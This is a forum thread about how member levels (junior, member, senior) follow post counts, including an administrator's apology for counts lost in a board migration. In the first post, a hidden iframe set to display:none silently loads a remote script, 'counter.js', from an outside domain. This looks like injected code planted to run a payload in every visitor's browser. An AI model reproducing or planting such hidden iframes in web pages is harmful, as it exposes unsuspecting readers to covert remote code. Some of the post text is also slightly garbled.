+ Reply to Thread
    ep

What is member level based on?

When I look at my posts it says "junior member" I was just wondering how this member level is determined.

ep<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

ep
    heh, seeing that I've now made my 30th post and I'm now a "member" I'm guess the levels are based on posts:

0-29 junior
    30-99 member
    100+ senior

that right?

Yep, that's right :
    --Jazz--

I've been here since May 2001, when there was nothing of this three tier system (jr. member, member, sr. member K__p and the 6035 was first available and I bought it. I've sufferred through the trials and tribulatons of the 6035 with the best of you. I must be a little touchy this evening. Even though I don't POST everyday, I access this board very frequently and have contributed, including trying to make the files that others haven't been able get accessible. Member status means very little to me, but when I see I'm referred to as a jr. member (changed from member) after being here so long, I AM OFFENDED.

nuclear_69 (aka "Mr. Radioactive")

The number of posts is a threshold that is set and has been the same from the old board to the new board. Now, if some posts, or your post count got forgotten or changed in the conversion process from the old board software to the new board software and dropped you below the junior member/member status, I am truly sorry but please understand that it was not intentional in any way.

I would offer to raise you to your previous post level you would like, but I see that you are now showing as having 30 posts already and are back to Member status. If you'd like me to adjust the number of posts I would be happy to do that for you.

Thank you for your support over this past year, and I hope you understand that this was not intentional.

-Jimmyjoe